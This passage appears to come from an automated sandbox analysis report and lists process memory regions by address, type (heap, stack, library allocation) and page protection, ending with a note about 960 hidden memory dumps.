trusted library allocation
|
page read and write
|
||
27D75504000
|
heap
|
page read and write
|
||
664A6FA000
|
stack
|
page read and write
|
||
7FFAAC356000
|
trusted library allocation
|
page execute and read and write
|
||
1D52EE5D000
|
heap
|
page read and write
|
||
20091BA7000
|
heap
|
page read and write
|
||
2008FB60000
|
heap
|
page read and write
|
||
2008FB81000
|
heap
|
page read and write
|
||
1C6D6316000
|
heap
|
page read and write
|
||
EAF000
|
heap
|
page read and write
|
||
1FFE3EA9000
|
heap
|
page read and write
|
||
1C6D62F9000
|
heap
|
page read and write
|
||
AED15BF000
|
stack
|
page read and write
|
||
1FFF5CA1000
|
trusted library allocation
|
page read and write
|
||
7FFAAC490000
|
trusted library allocation
|
page read and write
|
||
27D73830000
|
heap
|
page read and write
|
||
26F65370000
|
heap
|
page read and write
|
||
1D52EE92000
|
heap
|
page read and write
|
||
1D52F824000
|
heap
|
page read and write
|
||
AED16B9000
|
stack
|
page read and write
|
||
1D52F65F000
|
heap
|
page read and write
|
||
1C6D442B000
|
heap
|
page read and write
|
||
27D73900000
|
heap
|
page read and write
|
||
7FFB1DE01000
|
unkown
|
page execute read
|
||
1D52F6B6000
|
heap
|
page read and write
|
||
27D75CA0000
|
trusted library section
|
page read and write
|
||
1C6D62F1000
|
heap
|
page read and write
|
||
20091BBB000
|
heap
|
page read and write
|
||
20091B73000
|
heap
|
page read and write
|
||
1D52D46D000
|
heap
|
page read and write
|
||
27D75B50000
|
heap
|
page read and write
|
||
1D52EE73000
|
heap
|
page read and write
|
||
3972DFB000
|
stack
|
page read and write
|
||
1D52EE78000
|
heap
|
page read and write
|
||
50A0000
|
heap
|
page read and write
|
||
7FFAAC2BC000
|
trusted library allocation
|
page execute and read and write
|
||
1D52F7D0000
|
heap
|
page read and write
|
||
AED137D000
|
stack
|
page read and write
|
||
20091BCC000
|
heap
|
page read and write
|
||
20091BAC000
|
heap
|
page read and write
|
||
1D52F665000
|
heap
|
page read and write
|
||
1D52F675000
|
heap
|
page read and write
|
||
1C6D633A000
|
heap
|
page read and write
|
||
1D52EE98000
|
heap
|
page read and write
|
||
63D0000
|
heap
|
page read and write
|
||
27D7592A000
|
heap
|
page read and write
|
||
7FFAAC4D0000
|
trusted library allocation
|
page read and write
|
||
1D52F355000
|
heap
|
page read and write
|
||
664A9FF000
|
stack
|
page read and write
|
||
E98000
|
heap
|
page read and write
|
||
7FFAAC346000
|
trusted library allocation
|
page execute and read and write
|
||
20091B73000
|
heap
|
page read and write
|
||
2AA1000
|
trusted library allocation
|
page read and write
|
||
27D102FB000
|
trusted library allocation
|
page read and write
|
||
7FFAAC560000
|
trusted library allocation
|
page read and write
|
||
1C6D4500000
|
heap
|
page read and write
|
||
27D00434000
|
trusted library allocation
|
page read and write
|
||
1D52EE75000
|
heap
|
page read and write
|
||
7FFB1DE00000
|
unkown
|
page readonly
|
||
1C6D62F5000
|
heap
|
page read and write
|
||
7FFAAC580000
|
trusted library allocation
|
page read and write
|
||
58B7000
|
trusted library allocation
|
page read and write
|
||
1C6D62F9000
|
heap
|
page read and write
|
||
90B82FA000
|
stack
|
page read and write
|
||
2AD1000
|
trusted library allocation
|
page read and write
|
||
7FFB23B01000
|
unkown
|
page execute read
|
||
1D52F69A000
|
heap
|
page read and write
|
||
1D52EE89000
|
heap
|
page read and write
|
||
27D75985000
|
heap
|
page read and write
|
||
1D52EE9F000
|
heap
|
page read and write
|
||
1D52D45D000
|
heap
|
page read and write
|
||
27D75716000
|
heap
|
page read and write
|
||
1FFE3CB0000
|
heap
|
page read and write
|
||
1D52F650000
|
heap
|
page read and write
|
||
1D52F825000
|
heap
|
page read and write
|
||
1C6D5D64000
|
heap
|
page read and write
|
||
1D52F355000
|
heap
|
page read and write
|
||
1D52EE68000
|
heap
|
page read and write
|
||
1D52EE63000
|
heap
|
page read and write
|
||
1FFF5D11000
|
trusted library allocation
|
page read and write
|
||
1D52EE77000
|
heap
|
page read and write
|
||
1D52EEB9000
|
heap
|
page read and write
|
||
27D003F9000
|
trusted library allocation
|
page read and write
|
||
1FFE5CBB000
|
trusted library allocation
|
page read and write
|
||
7FFAAC510000
|
trusted library allocation
|
page read and write
|
||
2B96000
|
trusted library allocation
|
page read and write
|
||
2940000
|
trusted library allocation
|
page read and write
|
||
1D52F69D000
|
heap
|
page read and write
|
||
27D01755000
|
trusted library allocation
|
page read and write
|
||
1C6D4420000
|
heap
|
page read and write
|
||
1D52F64E000
|
heap
|
page read and write
|
||
7FFAAC4A0000
|
trusted library allocation
|
page read and write
|
||
E90000
|
heap
|
page read and write
|
||
7FFAAC4F0000
|
trusted library allocation
|
page read and write
|
||
1C6D440C000
|
heap
|
page read and write
|
||
27D73800000
|
heap
|
page read and write
|
||
3B37000
|
trusted library allocation
|
page read and write
|
||
200916D0000
|
heap
|
page read and write
|
||
7FFB1DE22000
|
unkown
|
page readonly
|
||
1C6D6323000
|
heap
|
page read and write
|
||
1C6D43D0000
|
heap
|
page read and write
|
||
1D52F67E000
|
heap
|
page read and write
|
||
27D73890000
|
trusted library allocation
|
page read and write
|
||
1D52D429000
|
heap
|
page read and write
|
||
1D52F636000
|
heap
|
page read and write
|
||
1D52EECF000
|
heap
|
page read and write
|
||
7FFB1DE01000
|
unkown
|
page execute read
|
||
200916D4000
|
heap
|
page read and write
|
||
27D7575A000
|
heap
|
page read and write
|
||
9A4FDAD000
|
stack
|
page read and write
|
||
7FFAAC4E0000
|
trusted library allocation
|
page read and write
|
||
1D52D4C3000
|
heap
|
page read and write
|
||
1C6D61B0000
|
heap
|
page read and write
|
||
C2D2EFE000
|
stack
|
page read and write
|
||
10A0000
|
trusted library allocation
|
page read and write
|
||
1D52D47D000
|
heap
|
page read and write
|
||
7FFAAC264000
|
trusted library allocation
|
page read and write
|
||
27D10001000
|
trusted library allocation
|
page read and write
|
||
C2D32FE000
|
stack
|
page read and write
|
There are 960 hidden memdumps, click here to show them.